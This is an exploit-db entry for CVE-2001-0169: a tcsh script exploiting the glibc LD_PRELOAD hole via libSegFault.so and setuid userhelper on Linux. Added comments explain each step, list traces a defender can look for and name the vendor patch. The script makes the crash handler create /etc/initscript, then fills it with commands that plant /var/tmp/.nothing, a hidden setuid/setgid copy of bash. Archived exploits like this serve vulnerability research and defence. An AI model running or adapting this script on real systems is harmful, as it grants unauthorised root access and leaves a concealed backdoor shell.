
GLIBC 2.1.3 - 'LD_PRELOAD' Local Privilege Escalation

Author: Shadow
type: local
platform: linux
port: 
date_added: 2001-03-03 
date_updated: 2017-11-22 
verified: 1 
codes: OSVDB-1731;CVE-2001-0169 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comglibc-2.1.3.tar.gz

#!/bin/tcsh
# Example of exploiting the hole in LD_PRELOAD.
# shadow (tested on redhat 6.0, should work on others)
#
# Reviewer summary (the page lists this as CVE-2001-0169 / OSVDB-1731):
#   1. Point libSegFault.so's crash report at /etc/initscript via environment
#      variables, then crash userhelper so that the report file gets created.
#   2. Overwrite the created file with three shell commands.
# NOTE(review): userhelper is presumably setuid root, otherwise the preloaded
# library could not create a file under /etc for an unprivileged caller; the
# script does not show this - confirm against the target system.
#
# Artifacts a defender can look for, all taken from the lines below:
#   - an unexpected /etc/initscript
#   - /var/tmp/.nothing, a copy of /bin/bash with mode 6755 (setuid + setgid)
#   - bursts of userhelper processes receiving signal 11
# Remediation is the vendor glibc update for the CVE above, after which the
# dynamic linker no longer honours this LD_PRELOAD for setuid/setgid programs.

# Message: "warning: /etc/initscript exists". If the file is already there,
# the while loop further down never runs, because its condition is "file is missing".
if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje
# LD_PRELOAD below names the library without any slash; the script changes to
# /lib first. NOTE(review): whether the cd is required is not visible here.
cd /lib
# Clear the umask so no permission bits are masked off files created from here on.
# NOTE(review): presumably this leaves the crash-report file writable by the
# caller, which the later `cat >` relies on - confirm.
umask 0
# Preload the segfault handler library and tell it where to write its report.
setenv LD_PRELOAD libSegFault.so
setenv SEGFAULT_OUTPUT_NAME /etc/initscript
# Message: "wait... this may take a while..."
echo czekaj... to moze chwile potrwac...
# Retry until the report file appears: start userhelper in the background and
# immediately send signal 11 (SIGSEGV) to every userhelper process. All output
# is discarded. NOTE(review): the retry suggests the signal has to arrive in a
# narrow window after the library is loaded - inferred, not shown.
while (! -e /etc/initscript )
  ( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null
end

# Message: "I created the initscript file"
echo utworzylem plik initscript

# Replace the report contents with a three-line script: copy /bin/bash to
# /var/tmp/.nothing, set mode 6755 on the copy, then delete /etc/initscript.
# Nothing in this file executes /etc/initscript; on sysvinit systems init(8)
# runs it when present (see initscript(5)), so the commands would run with
# init's privileges. The heredoc body is file content and must stay comment-free.
cat > /etc/initscript << _init_
cp /bin/bash /var/tmp/.nothing
chmod 6755 /var/tmp/.nothing
rm /etc/initscript
_init_

# Message: "and I even replaced it"
echo i nawet go podmienilem

# milw0rm.com [2001-03-04]